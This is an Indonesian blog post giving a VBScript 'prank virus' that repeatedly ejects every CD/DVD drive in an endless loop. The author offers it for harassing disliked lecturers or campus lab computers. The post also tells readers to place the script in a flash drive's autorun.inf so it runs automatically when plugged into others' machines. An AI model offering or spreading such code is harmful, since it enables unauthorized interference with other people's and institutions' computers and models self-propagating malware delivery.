twitter
googleplus
facebook

Membuat Virus "nakal"

Pernahkah kamu menemukan virus "Nakal" ketika flashdisk mu tercolok komputer teman atau temen kmu habis nyolokin flash disk ke komputer kamu?
kalo belum pernah kena virus yang satu ini pasti belum pernah ngerasain dikerjain ma virus yang super usil ini.
Nah pada kesempatan kali iin akan sedikit kita kupas tentang virus yang satu ini..
|mudah kok gak usah pusing dulu pleennd, tenang bro belanda masih jauhm so tenang ja mudah kok hehehehe ☺☻...
Yuk mari kita mulai buat “Virus” Nakal, buat ngerjain dosen/guru yang kita ngga suka, lagi suntuk di ruang labkom kampus, pusing ngga bisa maen facebook karena diblokir sama admin labkom,hahahaha DL donk (Derita Loe). yah iseng2 n coba aja buatin scripts .vbs. ini.
Caranya: Buka notepad dan masukkan code berikut,

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpanlah dengan file tadi dengan ekstensi file iseng.vbs ato apapun nama kesukaan asalkan pastikan ekstensinya .vbs, dan jalankan filenya ( Klik 2x), perhatikan CD/DVD ROM akan terbuka/tertutup dengan sendirinya tanpa henti.

Salah satu cara menghentikan aksi Virus Nakal ini ialah dengan menekan tombol CRTL+ALT+DEL dan matikan proses wscripts.exe, Kalo mau keren lagi, masukkan ke file autorun.inf di flashdisk anda, jadi setiap kamu colokin ke kompie kampus, maka akan otomatis dijalankan “Virus” Nakal ini.

Selamat mencoba...☺

oleh: Wahyu Miftahul Huda
  • Title : Membuat Virus "nakal"
  • Labels :
  • Author :
  • Rating: 100% based on 10 ratings. 5 user reviews.
  • 0 komentar:

    Posting Komentar